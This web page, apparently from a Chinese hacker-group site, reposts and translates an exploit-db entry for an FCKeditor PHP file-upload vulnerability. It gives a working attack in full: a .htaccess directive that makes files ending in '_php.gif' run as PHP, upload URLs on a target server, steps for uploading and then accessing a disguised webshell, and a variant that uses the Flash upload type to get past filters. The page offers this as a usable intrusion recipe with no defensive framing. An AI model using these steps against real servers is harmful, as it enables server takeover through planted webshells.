最大最专业黑客组织 -- 黑客联盟 -- Hacker Union For China -- www.ChinaHacker.Com -- 黑色矩防火墙 -- 专业防御DDOS攻击

联盟首页 技术文章 软件下载 DDOS防御 核心申请 分站申请 邮局系统 技术咨询 区域分化 广告合作 代理服务 版本V6.22

-------- Welcome To Hacker Union For China !Thank You For Your Support !--------
================ 维护祖国尊严 爱我中华 强我中华 耀我中华 ================
中国黑客联盟>>网络信息  |   中国黑客联盟>>系统知识  |  
中国黑客联盟>>网络信息>>漏洞入侵>>FCKeditor PHP版本爆出0day

FCKeditor PHP版本爆出0day


1.create a htaccess file:

code:
<FilesMatch "_php.gif">
SetHandler application/x-httpd-php
</FilesMatch>

2.Now upload this htaccess with FCKeditor.
http://target.com/FCKeditor/editor/filemanager/upload/test.html
http://target.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html
----------------------------------------------------------------------------------------------
3.Now upload shell.php.gif with FCKeditor.
4.After upload shell.php.gif, the name "shell.php.gif" change to "shell_php.gif" automatically.
5.http://target.com/anything/shell_php.gif

6.Now shell is available from server.

www.exploit-db.com上的

我就是个翻译一下

1.首先在本地创建一个.htaccess(注意前面有个点),内容为:

<FilesMatch "_php.gif">

SetHandler application/x-httpd-php

</FilesMatch>

2.然后用fckeditor把这个文件上传上去(至于FCKEDITOR如何上传这里不再赘述)

3.创建一个webshell,比如phpspy什么的,然后把后缀名改成shell.php.gif,上传上去。(可以用GIF文件头欺骗,不过有的过滤很严,可能上不上去,最后我会说一种方法,上传成功率高些)

4.文件名会变成shell_php.gif,访问这个文件,就会发现,你已经得到webshell

写在最后:

这个漏洞的还是很有局限性的,只适用于PHP的fck,而且还必须是apache之类的服务器,IIS什么的都不行。

还有就是有些人可能会遇到在上传图片的时候,fckeditor报错,说是错误的文件什么的,这里有个方法:

可以换种上传类型,用Flash上传就不会碰到类似的限制,不过.htaccess文件的内容也要改改,还有shell的文件名

<FilesMatch "_php.flv">

SetHandler application/x-httpd-php

</FilesMatch>

shell的名字改成shell.php.flv 这样就可以了

原作者:不详
来 源:不详
共有3203位读者阅读过此文

□- 本周热门文章
1.网络黑社会:谁来管管3721?[43485]
2.紧急通告:“冲击波”又出新变种 W3...[22823]
3.使用DWRCC远程安装3389[16458]
4.香港电影黑帮片经典的十七瞬间[12597]
5.Google Chrome V8 J...[12264]
6.私服安全系统安全精华篇[11292]
7.apache近期ddos漏洞解法[7426]

关于我们 | 分站申请 | 成员申请 | 技术论坛 | 站内导航 | 合作伙伴 | 联系我们

Copyrights © 2002 - 2019 www.ChinaHacker.com All Rights Reserved

版权所有   中 国 黑 客 联 盟

(Hacker Union For China V 6.22)

闽ICP备05007859号